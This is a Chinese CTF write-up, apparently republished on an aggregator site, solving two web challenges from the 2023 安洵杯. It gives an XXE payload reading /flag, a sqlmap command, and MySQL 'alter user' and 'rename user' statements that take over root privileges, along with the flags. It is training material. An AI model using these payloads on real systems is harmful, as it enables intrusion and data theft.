2023安洵杯web两道WP-Toy模板网

这篇具有很好参考价值的文章主要介绍了2023安洵杯web两道WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

Web

CarelessPy

在首页提示存在eval和login的路由，在download存在任意文件下载
访问eval可以读取目录下的文件，知道/app/pycache/part.cpython-311.pyc路径，然后使用download下载下来，进行反编译
2023安洵杯web两道WP

使用在线工具进行反编译，得到session的key
2023安洵杯web两道WP

然后对session进行伪造
2023安洵杯web两道WP

登录成功
2023安洵杯web两道WP

一看就是XML注入
2023安洵杯web两道WP

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file:///flag">
]>
<result><ctf>杂鱼~</ctf><web>
&shell;
</web></result>
#SYCTF{COrReCt_AN5w3r_fa0efe410508}

Confronting robot

打开网页发现存在sql注入
2023安洵杯web两道WP

直接sqlmap跑
payload:sqlmap -u "http://x.x.x.x:34918/?myname=aaa" -D robot_data -T name --columns --dump
2023安洵杯web两道WP

得到路由/sEcR@t_n@Bodyknow.php
在该页面可以通过POST传入code直接执行Sql语句
2023安洵杯web两道WP

使用sqlmap跑mysql.user的数据表查看一下权限，发现当前用户拥有Super_priv的权限，但是没有其他可以利用权限。但是root用户存在所有权限
2023安洵杯web两道WP

解题思路：修改'root'@'::1'为'secret'@'%'，然后把'secret'@'localhost'随便修改一个名字，这样链接的数据库就拥有root权限了。需要注意的是密码也需要改成和secret相同。
把secret密码dump下来
2023安洵杯web两道WP

首先修改root的密码，
payload：alter user 'root'@'127.0.0.1' identified by PASSWORD '*C4809B442CD41D91C25BAEA070D00FF39A87190D';
2023安洵杯web两道WP

查询是否修改成功
2023安洵杯web两道WP

在继续把'root'@'127.0.0.1'修改成'secret'@'%'
payload:rename user 'root'@'127.0.0.1' to 'secret'@'%';
2023安洵杯web两道WP

然后把'secret'@'localhost'修改成任意名字即可
payload:rename user 'secret'@'localhost' to 'aaa'@'%';
2023安洵杯web两道WP

最后直接读取game.php文件，获得flag
2023安洵杯web两道WP

SYCTF{RObOt_r0B07_3599ec7eac28}文章来源地址https://www.toymoban.com/news/detail-479159.html

到了这里，关于2023安洵杯web两道WP的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

2023安洵杯web两道WP

Web

CarelessPy

Confronting robot

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

支付宝扫一扫领取红包，优惠每天领

二维码1

二维码2